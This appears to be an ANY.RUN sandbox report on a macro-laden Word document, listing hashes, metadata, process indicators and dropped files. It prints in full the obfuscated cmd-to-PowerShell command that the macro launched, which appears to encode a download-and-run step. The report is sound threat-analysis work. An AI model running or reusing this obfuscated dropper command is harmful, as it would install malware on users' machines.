analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

xa34.doc

Full analysis: https://app.any.run/tasks/4995eea5-a22f-47e8-8747-e24bce1837e9
Verdict: Malicious activity
Analysis date: December 18, 2018, 10:15:00
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Dec 17 14:02:00 2018, Last Saved Time/Date: Mon Dec 17 14:02:00 2018, Number of Pages: 1, Number of Words: 4, Number of Characters: 23, Security: 0
MD5:

7B5FB3BCE9816B67360F400AE74AA1E0

SHA1:

B9829315962A7FBF671756C96DDD0A493219CBA8

SHA256:

38AC9500ADB04054F1E43EE386D33F007EF23EA1304A5196675E39CC1446E103

SSDEEP:

1536:i17ljmW9/bvFMhoQDt3vERKsnfJoX+a9Y:Ol/bvFiN0R

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2940)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2940)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 1936)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2940)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2940)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: -
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2018:12:17 14:02:00
ModifyDate: 2018:12:17 14:02:00
Pages: 1
Words: 4
Characters: 23
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 26
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
34
Monitored processes
3
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs cmd.exe no specs cmd.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2940"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\xa34.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
1936c:\RmbYTpSvXwYbNF\iOBiajwScRD\cGTFwOjbYZRBdE\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V/C"set t6=DWXzNnnuRqQhlaLripKI(H)S1:sJdt8eE@+M$f4m{v 7/jkYxg,wb0ycC'o};V-FGU=\.O&&for %I in (36,65,52,21,66,57,56,28,19,57,60,36,27,7,15,66,6,31,51,62,58,52,45,31,55,29,42,4,31,29,68,1,31,52,56,12,16,31,6,29,60,36,7,13,21,66,57,11,29,29,17,25,44,44,51,51,51,68,12,31,29,29,11,31,17,13,49,31,29,7,15,6,68,55,58,39,44,48,21,65,18,33,11,29,29,17,25,44,44,51,51,51,68,15,13,55,9,7,31,29,52,13,12,12,31,28,39,58,6,29,58,6,68,55,13,44,21,47,41,0,29,7,53,38,33,11,29,29,17,25,44,44,51,51,51,68,26,13,6,15,58,55,46,55,13,17,16,29,13,12,68,55,58,39,44,31,30,32,13,13,33,11,29,29,17,25,44,44,51,51,51,68,55,16,6,31,26,46,13,29,31,17,13,15,46,68,16,29,44,64,15,19,54,33,11,29,29,17,25,44,44,51,51,51,68,37,15,16,12,41,13,39,68,31,7,44,43,57,68,23,17,12,16,29,20,57,33,57,22,60,36,51,46,35,66,57,28,35,9,57,60,36,56,3,1,42,66,42,57,30,53,24,57,60,36,26,69,37,66,57,51,13,29,57,60,36,12,18,51,66,36,31,6,41,25,29,31,39,17,34,57,67,57,34,36,56,3,1,34,57,68,31,48,31,57,60,37,58,15,31,13,55,11,20,36,10,58,41,42,16,6,42,36,7,13,21,22,40,29,15,54,40,36,27,7,15,68,0,58,51,6,12,58,13,28,63,16,12,31,20,36,10,58,41,50,42,36,12,18,51,22,60,36,12,64,63,66,57,63,56,65,57,60,19,37,42,20,20,64,31,29,62,19,29,31,39,42,36,12,18,51,22,68,12,31,6,49,29,11,42,62,49,31,42,30,53,53,53,53,22,42,40,19,6,41,58,46,31,62,19,29,31,39,42,36,12,18,51,60,36,17,15,16,66,57,13,65,8,57,60,52,15,31,13,46,60,59,59,55,13,29,55,11,40,59,59,36,61,19,37,66,57,4,65,47,57,60,77)do set 4ZNn=!4ZNn!!t6:~%I,1!&&if %I equ 77 %CommonProgramW6432:~3,1%o%SystemRoot:~-2,1%e%APPDATA:~-7,1%she%TEMP:~-10,1%%LOCALAPPDATA:~-5,1% "!4ZNn:*4ZNn!=!""c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2672CmD /V/C"set t6=DWXzNnnuRqQhlaLripKI(H)S1:sJdt8eE@+M$f4m{v 7/jkYxg,wb0ycC'o};V-FGU=\.O&&for %I in (36,65,52,21,66,57,56,28,19,57,60,36,27,7,15,66,6,31,51,62,58,52,45,31,55,29,42,4,31,29,68,1,31,52,56,12,16,31,6,29,60,36,7,13,21,66,57,11,29,29,17,25,44,44,51,51,51,68,12,31,29,29,11,31,17,13,49,31,29,7,15,6,68,55,58,39,44,48,21,65,18,33,11,29,29,17,25,44,44,51,51,51,68,15,13,55,9,7,31,29,52,13,12,12,31,28,39,58,6,29,58,6,68,55,13,44,21,47,41,0,29,7,53,38,33,11,29,29,17,25,44,44,51,51,51,68,26,13,6,15,58,55,46,55,13,17,16,29,13,12,68,55,58,39,44,31,30,32,13,13,33,11,29,29,17,25,44,44,51,51,51,68,55,16,6,31,26,46,13,29,31,17,13,15,46,68,16,29,44,64,15,19,54,33,11,29,29,17,25,44,44,51,51,51,68,37,15,16,12,41,13,39,68,31,7,44,43,57,68,23,17,12,16,29,20,57,33,57,22,60,36,51,46,35,66,57,28,35,9,57,60,36,56,3,1,42,66,42,57,30,53,24,57,60,36,26,69,37,66,57,51,13,29,57,60,36,12,18,51,66,36,31,6,41,25,29,31,39,17,34,57,67,57,34,36,56,3,1,34,57,68,31,48,31,57,60,37,58,15,31,13,55,11,20,36,10,58,41,42,16,6,42,36,7,13,21,22,40,29,15,54,40,36,27,7,15,68,0,58,51,6,12,58,13,28,63,16,12,31,20,36,10,58,41,50,42,36,12,18,51,22,60,36,12,64,63,66,57,63,56,65,57,60,19,37,42,20,20,64,31,29,62,19,29,31,39,42,36,12,18,51,22,68,12,31,6,49,29,11,42,62,49,31,42,30,53,53,53,53,22,42,40,19,6,41,58,46,31,62,19,29,31,39,42,36,12,18,51,60,36,17,15,16,66,57,13,65,8,57,60,52,15,31,13,46,60,59,59,55,13,29,55,11,40,59,59,36,61,19,37,66,57,4,65,47,57,60,77)do set 4ZNn=!4ZNn!!t6:~%I,1!&&if %I equ 77 %CommonProgramW6432:~3,1%oweRsheLL "!4ZNn:*4ZNn!=!""C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
1 147
Read events
750
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
0
Text files
0
Unknown types
5

Dropped files

PID
Process
Filename
Type
2940WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA81A.tmp.cvr
MD5:
SHA256:
2940WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5DB1048D.wmf
MD5:
SHA256:
2940WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\21701323.wmf
MD5:
SHA256:
2940WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:C0E05B10780841AE15969333DA0BFE18
SHA256:8C88F01A0964845A6E238B57D62EF68368276FA649122C778F7D617F63C6E443
2940WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BB92692A.wmfwmf
MD5:4799DE503E7A50B2771C50C0D071E4BB
SHA256:CCEE874B0E62EAC3AAEDF4C9103862BBEABBA5332A4974E5E5A4454A36E6B275
2940WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D5489FBC.wmfwmf
MD5:5C14E14543A35BA3A10CCC4B7EAC6C9F
SHA256:4CD2BC6A202193F061CB74F0B9A0AAADEA121D13F9AE38160C3CFEED929BA67D
2940WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$xa34.docpgc
MD5:232F8E5AB0E1C76EA20A518B96F5BF07
SHA256:2475F2172140AC6496745953C708F8AF6BB76E7CB604CB8E9C7728D388EE6EF1
2940WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:AE1D478BC7B575A1C7EEC0E2654C834E
SHA256:AD45B468D79A50CE24E1AA4C238A20BFE61D1BC950B8F5112AC3C910D8244A85
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
0
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

No data

DNS requests

No data

Threats

No threats detected
No debug info